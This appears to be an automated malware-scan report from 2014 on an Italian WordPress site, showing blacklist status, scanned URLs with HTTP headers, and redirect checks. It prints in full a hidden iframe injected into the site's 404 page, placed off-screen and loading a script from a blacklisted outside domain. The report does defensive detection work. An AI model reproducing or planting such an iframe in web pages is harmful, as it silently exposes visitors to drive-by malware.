Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=comitatotfr.it
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://comitatotfr.it/ | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://comitatotfr.it/test404page.js | HTTP/1.1 301 Moved Permanently Cache-Control: no-cache, must-revalidate, max-age=0 Connection: close Date: Mon, 07 Apr 2014 23:23:14 GMT Pragma: no-cache Location: http://www.comitatotfr.it/test404page.js Server: Apache/2 Vary: Accept-Encoding,User-Agent Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Wed, 11 Jan 1984 05:00:00 GMT X-Pingback: http://www.comitatotfr.it/xmlrpc.php X-Powered-By: PHP/5.5.9 | clean |
http://www.comitatotfr.it/test404page.js | 404 Not Found Content-Length: 7031 Content-Type: text/html | malicious |
Page code contains blacklisted domain: www.madsciencesacto.com ...[1808 bytes skipped]... //www.comitatotfr.it/wp-includes/wlwmanifest.xml" /> <script type="text/javascript" src="http://www.comitatotfr.it/wp-content/themes/comi_tfr/script.js"></script> </head> <body class="error404"> <style>body {overflow-x:hidden;overflow-y:auto;} </style> <iframe id="cjjw" name="cjjw" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://www.madsciencesacto.com/P9DgL2Jb.php" > </iframe> <div id="art-main"> <div id="art-header-bg"> <div class="art-header-center"> <div class="art-header-png"></div> </div> </div> <div class="cleared"></div> <div id="art-menu-bg"> <div class="art-nav-l"></div> <div class="art-nav-r"></div> </div> & ...[6433 bytes skipped]... Malicious iFrame found. The same iFrame was found in 22 websites. size: 120x100 src: http://www.madsciencesacto.com/p9dgl2jb.php This URL is marked by Google as suspicious <iframe id="cjjw" name="cjjw" style="position:absolute; height: 100px; width:120px; left:5000px; top:120px;" src="http://www.madsciencesacto.com/p9dgl2jb.php" > | ||
http://www.comitatotfr.it/wp-includes/js/jquery/jquery.js?ver=1.10.2 | 200 OK Content-Length: 93085 Content-Type: application/javascript | clean |
http://www.comitatotfr.it/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7200 Content-Type: application/javascript | clean |
http://www.comitatotfr.it/wp-content/themes/comi_tfr/script.js | 200 OK Content-Length: 5924 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: comitatotfr.it
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
GET / HTTP/1.1
Host: comitatotfr.it
Result:
HTTP/1.1 500 timeout
Content-Type: text/plain
Second query (visit from search engine):
GET / HTTP/1.1
Host: comitatotfr.it
Referer: http://www.google.com/search?q=comitatotfr.it
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: comitatotfr.it
Referer: http://www.google.com/search?q=comitatotfr.it
Result:
The result is similar to the first query. There are no suspicious redirects found.